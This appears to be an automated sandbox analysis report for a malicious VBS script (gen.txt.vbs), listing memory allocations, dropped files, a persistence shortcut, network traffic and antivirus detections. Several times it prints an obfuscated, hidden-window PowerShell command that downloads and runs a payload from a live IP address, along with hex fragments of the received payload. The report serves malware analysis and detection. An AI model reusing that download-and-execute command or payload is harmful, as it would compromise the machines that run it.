NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05008000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05009000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0500f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05010000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05011000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05012000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05013000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Oct. 20, 2023, 5:33 p.m.	process_identifier: 2196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05014000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (2 events)

file	C:\Users\Public\Conted.vbs
file	C:\Users\Public\Conted.bat

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/9X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/9X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Oct. 20, 2023, 5:33 p.m.	show_type: 0 filepath_r: POWeRSHeLL.eXe parameters: -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/9X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789) filepath: POWeRSHeLL.eXe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 20, 2023, 5:33 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (4 events)

Data received	00_04_2A_2E_73_6D_00_00_06_80_37_00_00_04_2A_EA_73_B9_00_00_06_25_72_15_22_00_70_6F_A4_00_00_06_72_D1_40_00_70_6F_A6_00_00_06_25_72_2D_22_00_70_6F_A4_00_00_06_28_F4_00_00_0A_6F_A6_00_00_06_6F_AE_00_00_06_28_20_00_00_06_2A_5E_02_28_1C_00_00_0A_03_6F_22_00_00_0A_28_71_00_00_06_28_F8_00_00_0A_2A_5E_28_1C_00_00_0A_02_03_28_1D_00_00_0A_28_73_00_00_06_6F_1E_00_00_0A_2A_62_1F_20_8D_48_00_00_01_25_D0_41_00_00_04_28_0E_01_00_0A_80_40_00_00_04_2A_32_7E_42_00_00_04_02_6F_22_00_00_0A_2A_32_7E_42_00_00_04_02_6F_1E_00_00_0A_2A_32_02_28_13_01_00_0A_28_7D_00_00_06_2A_8E_1A_8D_48_00_00_01_25_19_02_D2_9C_25_18_02_1E_63_D2_9C_25_17_02_1F_10_63_D2_9C_25_16_02_1F_18_63_D2_9C_2A_4E_18_8D_48_00_00_01_25_17_02_D2_9C_25_16_02_1E_63_D2_9C_2A_32_02_28_14_01_00_0A_28_7D_00_00_06_2A_2E_73_15_01_00_0A_80_42_00_00_04_2A_56_02_15_7D_44_00_00_04_02_28_1B_00_00_0A_02_03_7D_43_00_00_04_2A_4A_02_7B_43_00_00_04_02_7B_44_00_00_04_6F_16_01_00_0A_2A_8A_02_02_7B_44_00_00_04_17_58_7D_44_00_00_04_02_7B_44_00_00_04_02_7B_43_00_00_04_6F_17_01_00_0A_FE_04_2A_22_02_15_7D_44_00_00_04_2A_56_02_28_1B_00_00_0A_02_03_7D_46_00_00_04_02_04_7D_45_00_00_04_2A_32_02_7B_46_00_00_04_6F_96_00_00_06_2A_4E_02_7B_46_00_00_04_6F_96_00_00_06_25_03_6F_B1_00_00_06_2A_4E_02_7B_46_00_00_04_6F_96_00_00_06_25_03_6F_99_00_00_06_2A_4E_02_7B_46_00_00_04_6F_96_00_00_06_25_03_6F_AA_00_00_06_2A_36_02_7B_45_00_00_04_03_6F_16_01_00_0A_2A_32_02_7B_45_00_00_04_6F_17_01_00_0A_2A_66_02_03_7D_47_00_00_04_02_02_7B_47_00_00_04_6F_80_00_00_0A_7D_48_00_00_04_2A_82_02_7B_4A_00_00_04_18_3B_0D_00_00_00_02_28_90_00_00_06_02_18_7D_4A_00_00_04_02_28_91_00_00_06_2A_82_02_7B_4A_00_00_04_19_3B_0D_00_00_00_02_28_90_00_00_06_02_19_7D_4A_00_00_04_02_28_91_00_00_06_2A_1E_02_28_95_00_00_06_2A_52_02_03_8C_6B_00_00_0
Data received	_63_20_03_00_00_00_63_20_15_F4_7D_57_61_7D_B0_00_00_04_20_50_00_00_00_28_41_01_00_06_39_D8_F0_FF_FF_26_20_3D_00_00_00_38_CD_F0_FF_FF_7E_9B_00_00_04_20_86_B2_A9_28_20_0F_93_7B_26_61_20_57_BA_D5_2A_61_7D_C7_00_00_04_20_72_00_00_00_38_A8_F0_FF_FF_7E_9B_00_00_04_20_10_99_96_5E_20_03_00_00_00_63_20_22_D3_D2_0B_61_7D_87_00_00_04_20_53_00_00_00_38_83_F0_FF_FF_7E_9B_00_00_04_20_4B_ED_20_75_20_02_00_00_00_62_20_B2_FC_A2_89_59_20_81_68_0B_45_61_7D_96_00_00_04_20_3E_00_00_00_38_58_F0_FF_FF_7E_9B_00_00_04_20_03_62_3B_22_66_20_FA_37_2C_C4_61_7D_C5_00_00_04_20_2D_00_00_00_28_41_01_00_06_3A_33_F0_FF_FF_26_20_49_00_00_00_38_28_F0_FF_FF_7E_9B_00_00_04_20_6F_61_B1_F6_20_1F_FD_E4_AC_61_20_70_9C_55_5A_61_7D_CC_00_00_04_20_47_00_00_00_28_40_01_00_06_3A_FE_EF_FF_FF_26_20_17_00_00_00_38_F3_EF_FF_FF_7E_9B_00_00_04_20_25_C9_66_EB_20_05_00_00_00_63_20_26_CD_FB_E0_61_7D_D3_00_00_04_20_1C_00_00_00_FE_0E_00_00_38_C6_EF_FF_FF_7E_9B_00_00_04_20_24_37_00_09_66_65_20_A9_66_3C_75_61_7D_70_00_00_04_20_55_00_00_00_FE_0E_00_00_38_A1_EF_FF_FF_73_3D_01_00_06_80_9B_00_00_04_20_1D_00_00_00_38_91_EF_FF_FF_7E_9B_00_00_04_20_DC_D2_17_21_20_11_A3_98_8D_58_20_05_00_00_00_62_20_A0_BD_0E_D6_61_7D_A9_00_00_04_20_33_00_00_00_38_66_EF_FF_FF_7E_9B_00_00_04_20_ED_CF_3F_CB_20_03_00_00_00_63_20_E1_7B_29_F1_61_7D_9A_00_00_04_20_5F_00_00_00_28_41_01_00_06_39_3C_EF_FF_FF_26_20_20_00_00_00_38_31_EF_FF_FF_7E_9B_00_00_04_20_A7_0A_D2_0E_20_78_27_D6_6D_61_20_DF_2D_04_63_61_7D_A5_00_00_04_20_10_00_00_00_38_0C_EF_FF_FF_7E_9B_00_00_04_20_A5_51_67_0A_20_4E_E7_2A_E7_59_20_04_00_00_00_63_20_A5_C6_33_02_61_7D_97_00_00_04_20_02_00_00_00_38_E1_EE_FF_FF_7E_9B_00_00_04_20_E4_88_17_A5_20_03_00_00_00_62_20_20_47_BC_28_61_7D_D8_00_00_04_20_12_00_00_00_28_41_01_00_06_3A_B7_EE_FF_FF_26_20_21_00_00_00_38_AC_EE_FF_FF_7E_9B_00_00_04_20_B4_C8_28_DE_20_4F_2E_1A_9E_58_20_03_F7_42_7C_61_7D_99_00_00_04_20_4F_00_00_00_28_41_01_00_06_39_82_EE_FF_FF_26_20_42_00_00_00_38_77_EE_FF_FF_7E_9B_00_00_04_20_22_39_8F_38_20_39_00_F3_C8_59_20_6D_A6_1C_7D_61_7D_8C_00_00_04_20_69_00_00_00_28_41_01_00_06_3A_4D_EE_FF_FF_26_20_6D_00_00_00_38_42_EE_FF_FF_7E_9B_00_00_04_20_C0_05_DB_E5_20_05_00_00_00_63_20_BB_68_0A_FB_61_7D_BB_00_00_04_20_02_00_00_00_28_40_01_00_06_39_18_EE_FF_FF_26_20_06_00_00_00_38_0D_EE_FF_FF_7E_9B_00_00_04_20_BD_AF_D4_E4_66_20_42_50_2B_1B_61_7D_8B_00_00_04_20_2B_00_00_00_28_41_01_00_06_3A_E8_ED_FF_FF_26_20_2D_00_00_00_38_DD_ED_FF_FF_7E_9B_00_00_04_20_36_3A_7D_2B_20_5D_4F_86_DA_61_20_04_50_1A_F0_61_7D_BC_00_00_04_20_6A_00_00_00_38_B8_ED_FF_FF_7E_9B_00_00_04_20_BD_CC_56_E6_20_03_00_00_00_62_20_B5_46_85_48_61_7D_DC_00_00_04_20_6D_00_00_00_28_40_01_00_06_39_8E_ED_FF_FF_26_20_79_00_00_00_38_83_ED_FF_FF_7E_9B_00_00_04_20_4A_57_A3_D8_20_04_D6_77_EA_58_65_20_B2_D2_E4_3C_61_7D_D4_00_00_04_20_58_00_00_00_38_5D_ED_FF_FF_7E_9B_00_00_04_20_78_E3_CC_DF_20_04_00_00_00_62_20_90_81_09_71_59_20_70_B3_F3_85_61_7D_94_00_00_04_20_0E_00_00_00_28_41_01_00_06_39_2D_ED_FF_FF_26_20_0D_00_00_00_38_22_ED_FF_FF_7E_9B_00_00_04_20_BE_70_F4_1C_65_20_5E_85_6F_FC_61_7D_AB_00_00_04_20_68_00_00_00_28_41_01_00_06_3A_FD_EC_FF_FF_26_20_69_00_00_00_38_F2_EC_FF_FF_7E_9B_00_00_04_20_44_23_5D_EE_20_D6_D9_98_2A_58_20_01_00_00_00_63_20_84_40_ED_3A_61_7D_B1_00_00_04_20_39_00_00_00_38_C7_EC_FF_FF_7E_9B_00_00_04_20_4D_66_6F_D6_65_20_B3_99_90_29_61_7D_AE_00_00_04_20_27_00_00_00_38_A7_EC_FF_FF_7E_9B_00_00_04_20_36_3A_7D_2B_20_5D_4F_86_DA_61_20_6B_75_FB_F1_61_7D_80_00_00_04_20_63_00_00_00_38_82_EC_FF_FF_7E_9B_00_00_04_20_47_F8_06_05_20_A2_91_DE_
Data received	5C_00_06_00_6F_1A_82_1A_12_00_9F_1A_82_1A_06_00_C4_1A_82_1A_06_00_DE_1A_82_1A_06_00_01_1B_82_1A_06_00_25_1B_2C_1B_06_00_4F_1B_2C_1B_06_00_71_1B_DC_00_06_00_7F_1B_8D_1B_06_00_A4_1B_8D_1B_06_00_B0_1B_A8_0B_06_00_E2_1B_2C_1B_06_00_FD_1B_DC_00_06_00_0A_1C_DC_00_06_00_3B_1C_DC_00_06_00_64_1C_5C_00_06_00_BB_1C_8D_1B_06_00_C2_1C_8D_1B_06_00_3A_1D_82_1A_06_00_58_1D_5C_00_06_00_6E_1D_DC_00_06_00_96_1D_82_1A_06_00_B1_1D_82_1A_06_00_BE_1D_82_1A_06_00_15_1E_1E_1E_06_00_54_1E_AD_01_06_00_82_1E_2C_1B_06_00_B8_1E_DC_00_06_00_63_1F_2C_1B_06_00_6E_1F_2C_1B_06_00_77_1F_2C_1B_06_00_82_1F_2C_1B_06_00_AA_1F_28_00_06_00_69_20_82_1A_06_00_16_21_5C_00_06_00_2F_21_3C_21_06_00_83_21_82_1A_06_00_D1_23_5C_00_06_00_EF_25_5C_00_06_00_ED_3C_5C_00_0A_00_9B_3D_A3_00_0A_00_06_3E_D4_03_06_00_AA_3E_A3_00_0E_00_EB_3E_7E_13_06_00_1B_3F_5C_00_0E_00_40_3F_7E_13_0A_00_53_3F_59_3F_06_00_BF_3F_28_00_0A_00_DA_3F_F1_3F_06_00_09_40_AD_01_06_00_2B_40_AD_01_06_00_3D_40_AD_01_06_00_45_40_5C_00_00_00_00_00_35_02_00_00_00_00_01_00_01_00_01_00_10_00_3E_02_01_00_51_00_03_00_15_00_02_01_00_00_49_02_00_00_55_00_04_00_19_00_02_01_00_00_70_02_00_00_55_00_04_00_1D_00_02_01_00_00_8E_02_00_00_55_00_04_00_21_00_02_01_00_00_A7_02_00_00_55_00_04_00_25_00_02_01_00_00_C5_02_00_00_55_00_04_00_29_00_02_01_00_00_DE_02_00_00_55_00_04_00_2D_00_02_01_00_00_F5_02_00_00_55_00_04_00_31_00_02_01_00_00_10_03_00_00_55_00_04_00_35_00_02_01_00_00_2A_03_00_00_55_00_04_00_39_00_02_01_00_00_47_03_00_00_55_00_04_00_3D_00_01_00_10_00_5E_03_01_00_51_00_04_00_41_00_0A_01_10_00_63_03_00_00_59_00_05_00_45_00_0A_01_10_00_80_03_00_00_59_00_09_00_45_00_01_00_10_00_93_03_01_00_51_00_12_00_45_00_01_00_10_00_9A_03_01_00_51_00_2A_00_50_00_01_00_10_00_9D_03_01_00_51_00_2B_00_68_00_00_01_10_00_A1_03_AA_03_5D_00_2C_00_74_00_00_01_00_00_E9_03_00_00_51_00_2E_00_7B_00_13_01_00_00_08_04_00_00_59_00_30_00_7B_00_00_00_00_00_24_04_00_00_61_00_30_00_7B_00_00_00_00_00_42_04_00_00_51_00_31_00_7F_00_00_00_10_00_71_04_84_04_51_00_31_00_7F_00_05_01_00_00_97_04_00_00_55_00_33_00_8A_00_00_00_00_00_AB_04_BE_04_51_00_33_00_8E_00_03_01_00_00_D1_04_00_00_55_00_5B_00_FE_00_05_00_10_00_E4_04_00_00_61_00_5B_00_02_01_05_00_10_00_F7_04_00_00_51_00_5B_00_03_01_05_00_10_00_0D_05_00_00_51_00_5C_00_06_01_05_01_00_00_20_05_00_00_55_00_5C_00_10_01_03_01_00_00_33_05_00_00_55_00_5C_00_14_01_0D_01_10_00_46_05_00_00_59_00_5C_00_18_01_05_00_10_00_59_05_00_00_51_00_5E_00_18_01_03_01_00_00_6C_05_00_00_55_00_5F_00_23_01_03_01_00_00_7F_05_00_00_55_00_5F_00_27_01_03_01_00_00_92_05_00_00_55_00_5F_00_2B_01_03_01_00_00_A5_05_00_00_55_00_5F_00_2F_01_03_01_00_00_B8_05_00_00_55_00_5F_00_33_01_03_01_00_00_CB_05_00_00_55_00_5F_00_37_01_03_01_00_00_DE_05_00_00_65_00_5F_00_3B_01_00_00_10_00_F6_05_09_06_51_00_60_00_3B_01_00_01_00_00_1C_06_00_00_51_00_61_00_3D_01_13_01_00_00_61_06_00_00_59_00_69_00_3D_01_13_01_00_00_7E_06_00_00_59_00_69_00_3D_01_13_01_00_00_9B_06_00_00_59_00_69_00_3D_01_13_01_00_00_B8_06_00_00_59_00_69_00_3D_01_13_01_00_00_D5_06_00_00_59_00_69_00_3D_01_13_01_00_00_F2_06_00_00_59_00_69_00_3D_01_13_01_00_00_0F_07_00_00_59_00_69_00_3D_01_00_01_10_00_2D_07_00_00_51_00_69_00_3D_01_00_01_00_00_5C_07_00_00_55_00_E3_00_42_01_00_01_00_00_6F_07_00_00_55_00_E4_00_46_01_00_01_00_00_82_07_00_00_55_00_E5_00_4A_01_00_01_00_00_95_07_00_00_55_00_E6_00_4E_01_00_01_00_00_A8_07_00_00_55_00_E7_00_52_01_00_01_00_00_BB_07_00_00_55_00_E8_00_56_01_00_01_00_00_CE_07_00_00_55_00_E9_00_5A_01_00_01_00_00_E1_07_00_00_55_00_EA_00_5E_01_00_01_00_00_F4_07_00_00_55_00_EB_0
Data received	0_62_01_00_01_00_00_07_08_00_00_55_00_EC_00_66_01_00_01_00_00_1A_08_00_00_55_00_ED_00_6A_01_00_01_00_00_2D_08_00_00_55_00_EE_00_6E_01_00_01_00_00_40_08_00_00_55_00_EF_00_72_01_00_01_00_00_53_08_00_00_55_00_F0_00_76_01_00_01_00_00_66_08_00_00_55_00_F1_00_7A_01_00_01_00_00_79_08_00_00_55_00_F2_00_7E_01_00_01_00_00_8C_08_00_00_55_00_F3_00_82_01_00_01_00_00_9F_08_00_00_55_00_F4_00_86_01_00_01_00_00_B2_08_00_00_55_00_F5_00_8A_01_00_01_00_00_C5_08_00_00_55_00_F6_00_8E_01_00_01_00_00_D8_08_00_00_55_00_F7_00_92_01_00_01_00_00_EB_08_00_00_55_00_F8_00_96_01_00_01_00_00_FE_08_00_00_55_00_F9_00_9A_01_00_01_00_00_11_09_00_00_55_00_FA_00_9E_01_00_01_00_00_24_09_00_00_55_00_FB_00_A2_01_00_01_00_00_38_09_00_00_55_00_FC_00_A6_01_00_01_00_00_4C_09_00_00_55_00_FD_00_AA_01_00_01_00_00_60_09_00_00_55_00_FE_00_AE_01_00_01_00_00_74_09_00_00_55_00_FF_00_B2_01_00_01_00_00_88_09_00_00_55_00_00_01_B6_01_00_01_00_00_9C_09_00_00_55_00_01_01_BA_01_00_01_00_00_B0_09_00_00_55_00_02_01_BE_01_00_01_00_00_C4_09_00_00_55_00_03_01_C2_01_00_01_00_00_D8_09_00_00_55_00_04_01_C6_01_00_01_00_00_EC_09_00_00_55_00_05_01_CA_01_00_01_00_00_00_0A_00_00_55_00_06_01_CE_01_00_01_00_00_14_0A_00_00_55_00_07_01_D2_01_00_01_00_00_28_0A_00_00_55_00_08_01_D6_01_00_01_00_00_3C_0A_00_00_55_00_09_01_DA_01_00_01_00_00_50_0A_00_00_55_00_0A_01_DE_01_00_01_00_00_64_0A_00_00_55_00_0B_01_E2_01_00_01_00_00_78_0A_00_00_55_00_0C_01_E6_01_00_01_00_00_8C_0A_00_00_55_00_0D_01_EA_01_00_01_00_00_A0_0A_00_00_55_00_0E_01_EE_01_00_01_00_00_B4_0A_00_00_55_00_0F_01_F2_01_00_01_00_00_C8_0A_00_00_55_00_10_01_F6_01_11_00_DC_0A_F7_00_13_00_ED_0A_FA_00_13_00_D0_0D_7C_01_11_00_7B_0F_64_02_26_00_CB_0F_6D_02_26_00_D9_0F_6D_02_26_00_E6_0F_70_02_21_00_F0_0F_70_02_06_00_F9_0F_70_02_21_00_FE_0F_73_02_21_00_08_10_73_02_21_00_10_10_73_02_21_10_16_10_76_02_21_00_1B_10_6D_02_21_00_25_10_6D_02_21_00_2E_10_6D_02_21_00_38_10_6D_02_11_00_41_10_7D_02_11_00_47_10_73_02_11_00_50_10_73_02_11_00_56_10_73_02_11_00_60_10_73_02_11_00_72_10_73_02_11_00_7F_10_73_02_11_00_91_10_73_02_11_00_9E_10_73_02_11_00_AC_10_73_02_11_00_BC_10_73_02_11_00_CB_10_73_02_11_00_DC_10_73_02_36_00_E8_10_81_02_36_00_F5_10_85_02_36_00_0B_11_89_02_36_00_1C_11_8D_02_36_00_32_11_91_02_36_00_43_11_95_02_36_00_52_11_99_02_36_00_65_11_9D_02_36_00_77_11_A1_02_36_00_8C_11_A5_02_13_00_9B_11_A9_02_13_00_71_12_09_03_13_00_AC_14_AA_03_11_00_95_15_D4_03_13_00_A5_15_D4

Poweshell is sending data to a remote host (1 event)

Data sent

GET /9X.jpg HTTP/1.1 Host: 185.81.157.213:222 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Oct. 20, 2023, 5:33 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

185.81.157.213

File has been identified by 11 AntiVirus engines on VirusTotal as malicious (11 events)

Symantec	ISB.Downloader!gen80
ESET-NOD32	PowerShell/Runner.A suspicious
Avast	Script:SNH-gen [PUP]
Kaspersky	HEUR:Trojan.Script.Generic
Tencent	Script.Trojan.Generic.Qsmw
DrWeb	VBS.DownLoader.2878
Sophos	VBS/DwnLdr-ACLB
ZoneAlarm	HEUR:Trojan.Script.Generic
Google	Detected
Ikarus	Trojan.PowerShell.Agent
AVG	Script:SNH-gen [PUP]

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Oct. 20, 2023, 5:33 p.m.	buffer: GET /9X.jpg HTTP/1.1 Host: 185.81.157.213:222 Connection: Keep-Alive socket: 1396 sent: 74	1	74	0

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	POWeRSHeLL.eXe -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/9X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
parent_process	wscript.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/9X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)

Creates a suspicious Powershell process (8 events)

option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user
option	-exec bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-wind hidden	value	Attempts to execute command with a hidden window
option	-noni	value	Prevents creating an interactive prompt for the user

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

gen.txt.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All